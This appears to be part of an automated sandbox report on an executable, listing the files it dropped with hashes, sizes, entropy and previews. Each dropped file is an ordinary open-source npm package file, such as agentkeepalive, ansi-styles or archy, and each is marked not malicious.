              SHA-512:A5E450181464CE1A585FA695ED2C68E422EEFC2F6D7B64F1F89B99922745D92A47D6CE7FE3A7A4CACC98A0A389913EFB7D4A10D0A9B52529A4C2E31615E5FDAF
              Malicious:false
              Reputation:unknown
              Preview:"use strict";.Object.defineProperty(exports, "__esModule", { value: true });.function promisify(fn) {. return function (req, opts) {. return new Promise((resolve, reject) => {. fn.call(this, req, opts, (err, rtn) => {. if (err) {. reject(err);. }. else {. resolve(rtn);. }. });. });. };.}.exports.default = promisify;.//# sourceMappingURL=promisify.js.map
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:JSON data
              Category:dropped
              Size (bytes):1635
              Entropy (8bit):4.738661246122317
              Encrypted:false
              SSDEEP:
              MD5:A42525D35CA83A583AF793FCB6780B56
              SHA1:609A1AAA756F9BD0D85449D4C9E1040C170E9115
              SHA-256:05DAA619E51686FD21D15F987F943F6692C56B9F489F555CBAF42A4263D5C5E8
              SHA-512:ED4B6698EC5329FFE616DF3831EAE9624867D98DB86842126F1CCB7E204105CB89CDFD6E5840BDDC89395A6F106C39582AC84B89C11801D58DCF3E685CCE1264
              Malicious:false
              Reputation:unknown
              Preview:{. "name": "agent-base",. "version": "6.0.2",. "description": "Turn a function into an `http.Agent` instance",. "main": "dist/src/index",. "typings": "dist/src/index",. "files": [. "dist/src",. "src". ],. "scripts": {. "prebuild": "rimraf dist",. "build": "tsc",. "postbuild": "cpy --parents src test '!**/*.ts' dist",. "test": "mocha --reporter spec dist/test/*.js",. "test-lint": "eslint src --ext .js,.ts",. "prepublishOnly": "npm run build". },. "repository": {. "type": "git",. "url": "git://github.com/TooTallNate/node-agent-base.git". },. "keywords": [. "http",. "agent",. "base",. "barebones",. "https". ],. "author": "Nathan Rajlich <nathan@tootallnate.net> (http://n8.io/)",. "license": "MIT",. "bugs": {. "url": "https://github.com/TooTallNate/node-agent-base/issues". },. "dependencies": {. "debug": "4". },. "devDependencies": {. "@types/debug": "4",. "@types/mocha": "^5.2.7",. "@types/node": "^14.0.20",.
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:Unicode text, UTF-8 text
              Category:dropped
              Size (bytes):10072
              Entropy (8bit):5.318774931178431
              Encrypted:false
              SSDEEP:
              MD5:07641492998656A54E3A56D927687608
              SHA1:E6BF068E786AD3D046465CEFDF011D4FBB02BE4A
              SHA-256:B861EA57CD9BC6DB4E0E7D427BB9E2A2CA0A78D7D41D96865D91C3786B1B458E
              SHA-512:EB33C516D5CE601D8F2BC1459EDA109118FBD34EC19523E22A47F91FD885553BB0C04A7C22A6DE11636F8D16C8E6959C7A9640663AD893FE779FCFA20396D109
              Malicious:false
              Reputation:unknown
              Preview:.4.5.0 / 2023-08-06.==================..**others**. * [[`1e5e312`](http://github.com/node-modules/agentkeepalive/commit/1e5e312f36491243372dbfee0dd47607e7b3d94a)] - deps: remove debug and depd (#114) (fengmk2 <<fengmk2@gmail.com>>)..4.4.0 / 2023-08-05.==================..**features**. * [[`c7c1e93`](http://github.com/node-modules/agentkeepalive/commit/c7c1e93beba7310d7c2cc9647dd211a686d21cac)] - feat: return socket from createConnection (#113) (Nabeel Bukhari <<nabeel.bukhari@hotmail.com>>)..4.3.0 / 2023-03-06.==================..**others**. * [[`6f9852b`](http://github.com/node-modules/agentkeepalive/commit/6f9852bf6f674846103e403fd9c84e92fc24f820)] - deps: depd@2.0.0 (#109) (Brian DeHamer <<bdehamer@github.com>>). * [[`fd4bd9b`](http://github.com/node-modules/agentkeepalive/commit/fd4bd9b0e0f051de3cb49559d1b0d534a0ded18c)] - test: use npm install (#110) (fengmk2 <<fengmk2@gmail.com>>). * [[`d52822c`](http://github.com/node-modules/agentkeepalive/commit/d52822c1243c689df1c8232a3b
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):1144
              Entropy (8bit):5.1706489914157
              Encrypted:false
              SSDEEP:
              MD5:AD61D9A1E5470F7DBFD001B294A070F7
              SHA1:42FAD0263E069B5043F2AC4784A779D1293C1B87
              SHA-256:1069803CB5C8700C35BDA7DE55532D6FD50FAA0B583C698A6F8D232BD4C248F7
              SHA-512:52D5295B35EAF04FA3B5C905BB4E16A1925E0D4E7B903614EE1CE0C50D542CB4B52BC55DD2F08A9AEC210AA548723A4402FF5EDED0D19627AE616E44613470F8
              Malicious:false
              Reputation:unknown
              Preview:The MIT License..Copyright(c) node-modules and other contributors..Copyright(c) 2012 - 2015 fengmk2 <fengmk2@gmail.com>..Permission is hereby granted, free of charge, to any person obtaining.a copy of this software and associated documentation files (the.'Software'), to deal in the Software without restriction, including.without limitation the rights to use, copy, modify, merge, publish,.distribute, sublicense, and/or sell copies of the Software, and to.permit persons to whom the Software is furnished to do so, subject to.the following conditions:..The above copyright notice and this permission notice shall be.included in all copies or substantial portions of the Software...THE SOFTWARE IS PROVIDED 'AS IS', WITHOUT WARRANTY OF ANY KIND,.EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF.MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT..IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY.CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):144
              Entropy (8bit):4.490133609669301
              Encrypted:false
              SSDEEP:
              MD5:556737E31C14D7C69D35869B9FC951E7
              SHA1:F7FA7011FC2CB8055AEB04BC21236061AF7F8585
              SHA-256:5C282AACF9E9E5DA7CA3F4E35D8F174D65C7D97B71C07DF3C5A50B491139B876
              SHA-512:140930A673BA362F5721795131D85E2B6C232FB6A22F9E58FB65EE7248420165600C17295F167F87F4A34F6635649AE17F5E0DDC098C2AABB02D6F448476360F
              Malicious:false
              Reputation:unknown
              Preview:module.exports = noop;.module.exports.HttpsAgent = noop;..// Noop function for browser since native api's don't use agents..function noop () {}.
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):169
              Entropy (8bit):4.633621018822663
              Encrypted:false
              SSDEEP:
              MD5:1BCF3FBC0D7840F0D7F4A6143B5DDF7E
              SHA1:56C0E83448095CFCBB77BA5413C40A163886E18E
              SHA-256:A5EE80E811A9FA4878911C1B3A212432DCBB7745B14292E92BA6D444DF95772F
              SHA-512:16C7A21C871348EEBFC4C9D83B6B9795A5293FF235656D01EBE24F18FC72790462E8B6AD0479D24763FC3D94C95B390A3285877D6B39538B5B0332BA84A03B06
              Malicious:false
              Reputation:unknown
              Preview:'use strict';..module.exports = require('./lib/agent');.module.exports.HttpsAgent = require('./lib/https_agent');.module.exports.constants = require('./lib/constants');.
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):15296
              Entropy (8bit):4.9866154752388425
              Encrypted:false
              SSDEEP:
              MD5:F3AB815CED83880E26D8BB8C913F7A42
              SHA1:53AFC81D2EFFBC7DBD4BC5CEDDDA6230774741CA
              SHA-256:2C9D6C2141727EC8C4578EFD7A0D763D17040E3C45BB7C4C2D579AA92719FD57
              SHA-512:237B3F9FE4ABC204338BCB996B146F0A70AE487C85E946D5D1F93A26FBC51D9385F8C91E79CA235BD01E65D7E53DAE7B1FB0BF3BBB373AC392F615244E001430
              Malicious:false
              Reputation:unknown
              Preview:'use strict';..const OriginalAgent = require('http').Agent;.const ms = require('humanize-ms');.const debug = require('util').debuglog('agentkeepalive');.const {. INIT_SOCKET,. CURRENT_ID,. CREATE_ID,. SOCKET_CREATED_TIME,. SOCKET_NAME,. SOCKET_REQUEST_COUNT,. SOCKET_REQUEST_FINISHED_COUNT,.} = require('./constants');..// OriginalAgent come from.// - https://github.com/nodejs/node/blob/v8.12.0/lib/_http_agent.js.// - https://github.com/nodejs/node/blob/v10.12.0/lib/_http_agent.js..// node <= 10.let defaultTimeoutListenerCount = 1;.const majorVersion = parseInt(process.version.split('.', 1)[0].substring(1));.if (majorVersion >= 11 && majorVersion <= 12) {. defaultTimeoutListenerCount = 2;.} else if (majorVersion >= 13) {. defaultTimeoutListenerCount = 3;.}..function deprecate(message) {. console.log('[agentkeepalive:deprecated] %s', message);.}..class Agent extends OriginalAgent {. constructor(options) {. options = options || {};. options.keepAlive = options.keepAlive !=
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):559
              Entropy (8bit):5.239181348647241
              Encrypted:false
              SSDEEP:
              MD5:3CC091553E5B92CB348495EABBE2999F
              SHA1:43D5BF54E14D0F2235C9AB8670D2ADAA23640157
              SHA-256:4F12E321CC734AF3CB53389861245B2B1960CDCDB570704048905C9EB88BB0D3
              SHA-512:1EB6C6880E734704E8BBD7D0D139E2A6C3ED3D33F21D4D2BCFD68EE7CCA1C631746EADABAAA4B498AEB08451A4E312FCC6AFC4F0EDCDF7DEE3DEAA5DC59596B4
              Malicious:false
              Reputation:unknown
              Preview:'use strict';..module.exports = {. // agent. CURRENT_ID: Symbol('agentkeepalive#currentId'),. CREATE_ID: Symbol('agentkeepalive#createId'),. INIT_SOCKET: Symbol('agentkeepalive#initSocket'),. CREATE_HTTPS_CONNECTION: Symbol('agentkeepalive#createHttpsConnection'),. // socket. SOCKET_CREATED_TIME: Symbol('agentkeepalive#socketCreatedTime'),. SOCKET_NAME: Symbol('agentkeepalive#socketName'),. SOCKET_REQUEST_COUNT: Symbol('agentkeepalive#socketRequestCount'),. SOCKET_REQUEST_FINISHED_COUNT: Symbol('agentkeepalive#socketRequestFinishedCount'),.};.
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):1264
              Entropy (8bit):5.052016469933988
              Encrypted:false
              SSDEEP:
              MD5:BE0942ED24BF897AC553116DE238C63E
              SHA1:0CDBD8D562BDFF1563B2D90D96FDEDBF4EA29751
              SHA-256:7A7E5ED882453189CF05B3EFF149ABA2CCE2D3EE6DDBC54A7D8747641150EC63
              SHA-512:3BFDCA76CA9AE1BC374532D18F187D91CF3F05F54215085C8C0285969DDB12B1EFAC062B54D35C3A2C4253C811B8963480DE2E78B567447B4060170E4A91590D
              Malicious:false
              Reputation:unknown
              Preview:'use strict';..const OriginalHttpsAgent = require('https').Agent;.const HttpAgent = require('./agent');.const {. INIT_SOCKET,. CREATE_HTTPS_CONNECTION,.} = require('./constants');..class HttpsAgent extends HttpAgent {. constructor(options) {. super(options);.. this.defaultPort = 443;. this.protocol = 'https:';. this.maxCachedSessions = this.options.maxCachedSessions;. /* istanbul ignore next */. if (this.maxCachedSessions === undefined) {. this.maxCachedSessions = 100;. }.. this._sessionCache = {. map: {},. list: [],. };. }.. createConnection(options, oncreate) {. const socket = this[CREATE_HTTPS_CONNECTION](options, oncreate);. this[INIT_SOCKET](socket, options);. return socket;. }.}..// https://github.com/nodejs/node/blob/master/lib/https.js#L89.HttpsAgent.prototype[CREATE_HTTPS_CONNECTION] = OriginalHttpsAgent.prototype.createConnection;..[. 'getName',. '_getSession',. '_cacheSession',. // https://github.com/nodejs/node/pu
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:JSON data
              Category:dropped
              Size (bytes):1324
              Entropy (8bit):4.755129012306371
              Encrypted:false
              SSDEEP:
              MD5:A1428ECF5A4086981510A1C96D92EF9B
              SHA1:1A8E3BD1F37B7229305001D1BD52253A4582049F
              SHA-256:15CD8FC95A7F4156EF88FF24B4F7015B619A8CCD4FAD6152A46693D017ADF8A9
              SHA-512:B1B08C69F02F27FB80A3CEBCFE6939950BCFDCFE9E15182FAAA881953CDC5D9659C8BCA403ED329F857B7FA58458C3E16B722228A2D750C074C8E32A6BCE24E5
              Malicious:false
              Reputation:unknown
              Preview:{. "name": "agentkeepalive",. "version": "4.5.0",. "description": "Missing keepalive http.Agent",. "main": "index.js",. "browser": "browser.js",. "files": [. "index.js",. "index.d.ts",. "browser.js",. "lib". ],. "scripts": {. "contributor": "git-contributor",. "test": "npm run lint && egg-bin test --full-trace",. "test-local": "egg-bin test --full-trace",. "cov": "cross-env NODE_DEBUG=agentkeepalive egg-bin cov --full-trace",. "ci": "npm run lint && npm run cov",. "lint": "eslint lib test index.js". },. "repository": {. "type": "git",. "url": "git://github.com/node-modules/agentkeepalive.git". },. "bugs": {. "url": "https://github.com/node-modules/agentkeepalive/issues". },. "keywords": [. "http",. "https",. "agent",. "keepalive",. "agentkeepalive",. "HttpAgent",. "HttpsAgent". ],. "dependencies": {. "humanize-ms": "^1.2.1". },. "devDependencies": {. "coffee": "^5.3.0",. "cross-env": "^6.0.3",. "e
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):1252
              Entropy (8bit):4.893422423694598
              Encrypted:false
              SSDEEP:
              MD5:75B8C34F60F1AD3FFAE42E16B19E5DB3
              SHA1:35D3B82A85493A87B6E30C6D5033D72B764C1A93
              SHA-256:84C72B3601FCCEBD43285959F9085AD3E4AF0D5683613DD125CE8E56B7AA8185
              SHA-512:E35FE12B1B1395A281D7439E544194D1638989BAA0E48D173F061BC32E52ACDE5B8568AC78C43DEA8423F98F5A695ECC42FED4921EFD0931A9B5F27B1F227357
              Malicious:false
              Reputation:unknown
              Preview:'use strict';.const indentString = require('indent-string');.const cleanStack = require('clean-stack');..const cleanInternalStack = stack => stack.replace(/\s+at .*aggregate-error\/index.js:\d+:\d+\)?/g, '');..class AggregateError extends Error {..constructor(errors) {...if (!Array.isArray(errors)) {....throw new TypeError(`Expected input to be an Array, got ${typeof errors}`);...}....errors = [...errors].map(error => {....if (error instanceof Error) {.....return error;....}.....if (error !== null && typeof error === 'object') {.....// Handle plain error objects with message property and/or possibly other metadata.....return Object.assign(new Error(error.message), error);....}.....return new Error(error);...});....let message = errors.....map(error => {.....// The `stack` property is not standardized, so we can't assume it exists.....return typeof error.stack === 'string' ? cleanInternalStack(cleanStack(error.stack)) : String(error);....}).....join('\n');...message = '\n' + indentStrin
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:JSON data
              Category:dropped
              Size (bytes):694
              Entropy (8bit):4.765344536488742
              Encrypted:false
              SSDEEP:
              MD5:592BD2970873EB33B51C4C333A303EA5
              SHA1:1A2AA44C34E2912CC96C75D0F1C2865A23A5E6F8
              SHA-256:903137F787B80F82CDD11659B386966FA716BE537E81FE9D474EF04EA0918F26
              SHA-512:BD0F134CB36390EAE59E1D1CB3FA50F121074667BD6FCC7A5771BBDC1631A7549DFABD9EDFEF9DD20A84C4FAD60933963ED491DC806FB19B07301DBEBDBA5988
              Malicious:false
              Reputation:unknown
              Preview:{.."name": "aggregate-error",.."version": "3.1.0",.."description": "Create an error from multiple errors",.."license": "MIT",.."repository": "sindresorhus/aggregate-error",.."author": {..."name": "Sindre Sorhus",..."email": "sindresorhus@gmail.com",..."url": "sindresorhus.com"..},.."engines": {..."node": ">=8"..},.."scripts": {..."test": "xo && ava && tsd"..},.."files": [..."index.js",..."index.d.ts"..],.."keywords": [..."aggregate",..."error",..."combine",..."multiple",..."many",..."collection",..."iterable",..."iterator"..],.."dependencies": {..."clean-stack": "^2.0.0",..."indent-string": "^4.0.0"..},.."devDependencies": {..."ava": "^2.4.0",..."tsd": "^0.7.1",..."xo": "^0.25.3"..}.}.
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):350
              Entropy (8bit):5.560452725735631
              Encrypted:false
              SSDEEP:
              MD5:7D1A59D7267EEF993B9827EE185500AB
              SHA1:9305AE17262F6E11F8AFD69835907716BA5C8EE0
              SHA-256:C92312790EB1F246B7C4C1FE9C1247B15441BBCA3C6CB64D167BEEFC45302753
              SHA-512:D1BD977B33603F9D06D947BFE108C1945CC2CD4575CD39EB84A20F15876A7DFFC59C3B52C92AF3B6483C1BB426983BFCC0C00FAFFE32821A5BDB0BD7D38A0484
              Malicious:false
              Reputation:unknown
              Preview:'use strict';..module.exports = ({onlyFirst = false} = {}) => {..const pattern = [...'[\\u001B\\u009B][[\\]()#;?]*(?:(?:(?:(?:;[-a-zA-Z\\d\\/#&.:=?%@~_]+)*|[a-zA-Z\\d]+(?:;[-a-zA-Z\\d\\/#&.:=?%@~_]*)*)?\\u0007)',...'(?:(?:\\d{1,4}(?:;\\d{0,4})*)?[\\dA-PR-TZcf-ntqry=><~]))'..].join('|');...return new RegExp(pattern, onlyFirst ? undefined : 'g');.};.
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:JSON data
              Category:dropped
              Size (bytes):841
              Entropy (8bit):4.719996304668275
              Encrypted:false
              SSDEEP:
              MD5:A23FAA508E1750CE0AF91A3F51C2053D
              SHA1:F1B78E043012E1AB5689D57377093E88F1400677
              SHA-256:8B2DC166F2B74D5098BAD38BDD3DD2F4D4775C626199872F5E36DBB48C40931D
              SHA-512:B53CD8D9164C75765D100D66ECEBB7A21BE515C85E66630AB072C147A5DAA08F2A205BA03127EDD4799C48867B9DBF99B2AE73C261BB16B937447574E8AA090B
              Malicious:false
              Reputation:unknown
              Preview:{.."name": "ansi-regex",.."version": "5.0.1",.."description": "Regular expression for matching ANSI escape codes",.."license": "MIT",.."repository": "chalk/ansi-regex",.."author": {..."name": "Sindre Sorhus",..."email": "sindresorhus@gmail.com",..."url": "sindresorhus.com"..},.."engines": {..."node": ">=8"..},.."scripts": {..."test": "xo && ava && tsd",..."view-supported": "node fixtures/view-codes.js"..},.."files": [..."index.js",..."index.d.ts"..],.."keywords": [..."ansi",..."styles",..."color",..."colour",..."colors",..."terminal",..."console",..."cli",..."string",..."tty",..."escape",..."formatting",..."rgb",..."256",..."shell",..."xterm",..."command-line",..."text",..."regex",..."regexp",..."re",..."match",..."test",..."find",..."pattern"..],.."devDependencies": {..."ava": "^2.4.0",..."tsd": "^0.9.0",..."xo": "^0.25.3"..}.}.
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):4139
              Entropy (8bit):5.323586464618429
              Encrypted:false
              SSDEEP:
              MD5:9D4ACB14D5449B232B22BFE40453B00C
              SHA1:5F96DF8B074E4854C03DB87EF309EB6C741F4618
              SHA-256:D3F197D370760DDD8753C1355B4BDB585A787F1BAA92BB8ED217F170C138B594
              SHA-512:34DDB9208914AC53ED7C0E7162F74D0313A8F348F34DB824414028313C03DE674995AC98BBF856F5219D44D1AF1455FA41678EB14DBC4639567B9227EF11CA31
              Malicious:false
              Reputation:unknown
              Preview:'use strict';..const wrapAnsi16 = (fn, offset) => (...args) => {..const code = fn(...args);..return `\u001B[${code + offset}m`;.};..const wrapAnsi256 = (fn, offset) => (...args) => {..const code = fn(...args);..return `\u001B[${38 + offset};5;${code}m`;.};..const wrapAnsi16m = (fn, offset) => (...args) => {..const rgb = fn(...args);..return `\u001B[${38 + offset};2;${rgb[0]};${rgb[1]};${rgb[2]}m`;.};..const ansi2ansi = n => n;.const rgb2rgb = (r, g, b) => [r, g, b];..const setLazyProperty = (object, property, get) => {..Object.defineProperty(object, property, {...get: () => {....const value = get();.....Object.defineProperty(object, property, {.....value,.....enumerable: true,.....configurable: true....});.....return value;...},...enumerable: true,...configurable: true..});.};../** @type {typeof import('color-convert')} */.let colorConvert;.const makeDynamicStyles = (wrap, targetSpace, identity, isBackground) => {..if (colorConvert === undefined) {...colorConvert = require('color-conve
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:JSON data
              Category:dropped
              Size (bytes):1054
              Entropy (8bit):4.899041833102491
              Encrypted:false
              SSDEEP:
              MD5:AB7A71AB9F6B46ACDA83106C5F34E6E3
              SHA1:3C9EF7BD0A1C3D805814C654C457CC315C48C116
              SHA-256:D405F010681D53F77691015E98461F8484B2AFE6A9EDFDD2DDB27B1E8A8E883D
              SHA-512:4D99655EBD3AC09430AB6BEB431D4F95F71BAC48C87F67D10CFE2614F77B20655A47EECB973DA1355E15104344DC4688A6C7DF128514005D9BD5462C8EDC62C3
              Malicious:false
              Reputation:unknown
              Preview:{.."name": "ansi-styles",.."version": "4.3.0",.."description": "ANSI escape codes for styling strings in the terminal",.."license": "MIT",.."repository": "chalk/ansi-styles",.."funding": "https://github.com/chalk/ansi-styles?sponsor=1",.."author": {..."name": "Sindre Sorhus",..."email": "sindresorhus@gmail.com",..."url": "sindresorhus.com"..},.."engines": {..."node": ">=8"..},.."scripts": {..."test": "xo && ava && tsd",..."screenshot": "svg-term --command='node screenshot' --out=screenshot.svg --padding=3 --width=55 --height=3 --at=1000 --no-cursor"..},.."files": [..."index.js",..."index.d.ts"..],.."keywords": [..."ansi",..."styles",..."color",..."colour",..."colors",..."terminal",..."console",..."cli",..."string",..."tty",..."escape",..."formatting",..."rgb",..."256",..."shell",..."xterm",..."log",..."logging",..."command-line",..."text"..],.."dependencies": {..."color-convert": "^2.0.1"..},.."devDependencies": {..."@types/color-convert": "^1.9.0",..."ava": "^2.3.0",..."svg-term-cli":
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):752
              Entropy (8bit):5.0549042450081485
              Encrypted:false
              SSDEEP:
              MD5:9D215C9223FBEF14A4642CC450E7ED4B
              SHA1:279F47BEDBC7BB9520C5F26216B2323E8F0E728E
              SHA-256:0CEF05DFFF8B6AA7F35596984F5709F0D17C2582924A751EFA471A76DE7CDC11
              SHA-512:5E4BA806F279089D705E909E3C000674C4186D618D6AB381619099F8895AF02979F3FC9ABB43F78B9FFED33B90A7861F6C4B9D6C1BB47ED14A79E7F90ECA833C
              Malicious:false
              Reputation:unknown
              Preview:Copyright (c) 2015, Rebecca Turner <me@re-becca.org>..Permission to use, copy, modify, and/or distribute this software for any.purpose with or without fee is hereby granted, provided that the above.copyright notice and this permission notice appear in all copies...THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES.WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF.MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR.ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES.WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN.ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF.OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE...
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):3644
              Entropy (8bit):5.078415077241078
              Encrypted:false
              SSDEEP:
              MD5:399E6995F10AEA9B281AA1C31470D565
              SHA1:EEE2C098296F4A9C8BA959151B8A965E6DFAEC34
              SHA-256:17C1B40011C39799E42FF4B4AE403F8109BA381AA2975FEDC9EB155B922026F2
              SHA-512:A4DA34A4D7102576BE3B55BD51CE8F6E92B5986AC4C564855748934FCABD486A06F67C349CDA4F5C8D2A10C67F21351282739596A20C8F40FF392DDEE2F3D87C
              Malicious:false
              Reputation:unknown
              Preview:'use strict'.module.exports = validate..function isArguments (thingy) {. return thingy != null && typeof thingy === 'object' && thingy.hasOwnProperty('callee').}..const types = {. '*': {label: 'any', check: () => true},. A: {label: 'array', check: _ => Array.isArray(_) || isArguments(_)},. S: {label: 'string', check: _ => typeof _ === 'string'},. N: {label: 'number', check: _ => typeof _ === 'number'},. F: {label: 'function', check: _ => typeof _ === 'function'},. O: {label: 'object', check: _ => typeof _ === 'object' && _ != null && !types.A.check(_) && !types.E.check(_)},. B: {label: 'boolean', check: _ => typeof _ === 'boolean'},. E: {label: 'error', check: _ => _ instanceof Error},. Z: {label: 'null', check: _ => _ == null}.}..function addSchema (schema, arity) {. const group = arity[schema.length] = arity[schema.length] || []. if (group.indexOf(schema) === -1) group.push(schema).}..function validate (rawSchemas, args) {. if (arguments.length !== 2) throw wrongNumberOf
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:JSON data
              Category:dropped
              Size (bytes):740
              Entropy (8bit):4.67000471346993
              Encrypted:false
              SSDEEP:
              MD5:B31E043E45EB9136AA1A57157E36E186
              SHA1:6EF09990F223572C66907D053A82FADD8AD8475E
              SHA-256:44CA10FFD2A5D94BF4CD84383D609179AE9CC28CE27E926D4882D2735EA2B52D
              SHA-512:8541CCDFC42D6E1C8C868A544AA800951F63D0F646862D28BED5F0582DB56583F6C43B532AEED15BDED199B7DB555BD8F048FD90B6DDD3718BDF842C500B2F2A
              Malicious:false
              Reputation:unknown
              Preview:{. "name": "aproba",. "version": "2.0.0",. "description": "A ridiculously light-weight argument validator (now browser friendly)",. "main": "index.js",. "directories": {. "test": "test". },. "dependencies": {},. "devDependencies": {. "standard": "^11.0.1",. "tap": "^12.0.1". },. "files": [. "index.js". ],. "scripts": {. "pretest": "standard",. "test": "tap --100 -J test/*.js". },. "repository": {. "type": "git",. "url": "https://github.com/iarna/aproba". },. "keywords": [. "argument",. "validate". ],. "author": "Rebecca Turner <me@re-becca.org>",. "license": "ISC",. "bugs": {. "url": "https://github.com/iarna/aproba/issues". },. "homepage": "https://github.com/iarna/aproba".}.
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):387
              Entropy (8bit):3.541891175201308
              Encrypted:false
              SSDEEP:
              MD5:B4270AB659E13669EC1A126EB2F38FBF
              SHA1:8435F1FDA19336C06418AEA99D1836BBCF362CE8
              SHA-256:7D9459ACDFD93B11CB8DC56A4E7F2801A5B2234ED51D08B29FDDB92871303974
              SHA-512:8192BDB0A43896F3A9711005D154E934E9E53467966FBBC7378D0A2A086C04A0D9B06BCADA846D658E27E9611FEB4E8A8F324E8BD3AAE39B4FEBC1FBFAE862A3
              Malicious:false
              Reputation:unknown
              Preview:var archy = require('../');.var s = archy({. label : 'beep',. nodes : [. 'ity',. {. label : 'boop',. nodes : [. {. label : 'o_O',. nodes : [. {. label : 'oh',. nodes : [ 'hello', 'puny' ]. },. 'human'. ]. },. 'party\ntime!'. ]. }. ].});.console.log(s);.
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):414
              Entropy (8bit):3.688173167581714
              Encrypted:false
              SSDEEP:
              MD5:3CEB7D2EFB926E80FEC9FDC5393700A1
              SHA1:2BAA09F9F176E625247F9894AC770FB9C6E1C24C
              SHA-256:7ED4F7782C6CB3E4610EEFB7C82C33745AF1D1897E4F7A2F9D60377F1A3AC7F9
              SHA-512:295115E617689CFF03EEDC36EF5ED5313FE633152FA7B0C71548AF2DAF5B3C89FDA82F5EFE6B77B5C65EA6AF313CD36C2D1D0B3BBA3ACD6CF655FE442E37B492
              Malicious:false
              Reputation:unknown
              Preview:var archy = require('../');..var s = archy({. label : 'beep\none\ntwo',. nodes : [. 'ity',. {. label : 'boop',. nodes : [. {. label : 'o_O\nwheee',. nodes : [. {. label : 'oh',. nodes : [ 'hello', 'puny\nmeat' ]. },. 'creature'. ]. },. 'party\ntime!'. ]. }. ].});.console.log(s);.
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:Unicode text, UTF-8 text
              Category:dropped
              Size (bytes):1140
              Entropy (8bit):4.2176827882897765
              Encrypted:false
              SSDEEP:
              MD5:AD34826623828678C831B473D7D9F1DD
              SHA1:893D827A6D051964E215C48EE9A9ECDCB6A5D899
              SHA-256:7E261460730CE150B289DF512EBFC68EE6DAAE3A8D88698D078122E8D85C8D10
              SHA-512:72C37D0F7581894F9FDCC4CC3E042A02E1D78684133AC5DC220253E3E4055BD40151A1C287B6B27C7D6CE7BBA25CEC5C60DF994DECB0F3DCDB78377C6EFB5C25
              Malicious:false
              Reputation:unknown
              Preview:module.exports = function archy (obj, prefix, opts) {. if (prefix === undefined) prefix = '';. if (!opts) opts = {};. var chr = function (s) {. var chars = {. '.' : '|',. '.' : '`',. '.' : '+',. '.' : '-',. '.' : '-'. };. return opts.unicode === false ? chars[s] : s;. };. . if (typeof obj === 'string') obj = { label : obj };. . var nodes = obj.nodes || [];. var lines = (obj.label || '').split('\n');. var splitter = '\n' + prefix + (nodes.length ? chr('.') : ' ') + ' ';. . return prefix. + lines.join(splitter) + '\n'. + nodes.map(function (node, ix) {. var last = ix === nodes.length - 1;. var more = node.nodes && node.nodes.length;. var prefix_ = prefix + (last ? ' ' : chr('.')) + ' ';. . return prefix. + (last ? chr('.') : chr('.')) + chr('.'). + (more ? chr(
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:JSON data
              Category:dropped
              Size (bytes):978
              Entropy (8bit):4.074930978886546
              Encrypted:false
              SSDEEP:
              MD5:EAB72A1E199E2EC3F194AFB9D33C4B07
              SHA1:3BD81E8F9D8E79057497B7473C6EAC4F3D519149
              SHA-256:110F0D7B53D31AF7E873B09AAEED3F951BED467697CE3B672FB7E8A9B8A4925A
              SHA-512:06A443CB38D50DE14CA427A41BA2B438253AB6BC49DB99BF48D83FC6340C3387F06E56464A18CCCED3ABEE42996E28831E555D88D6009A0A96421CE697415465
              Malicious:false
              Reputation:unknown
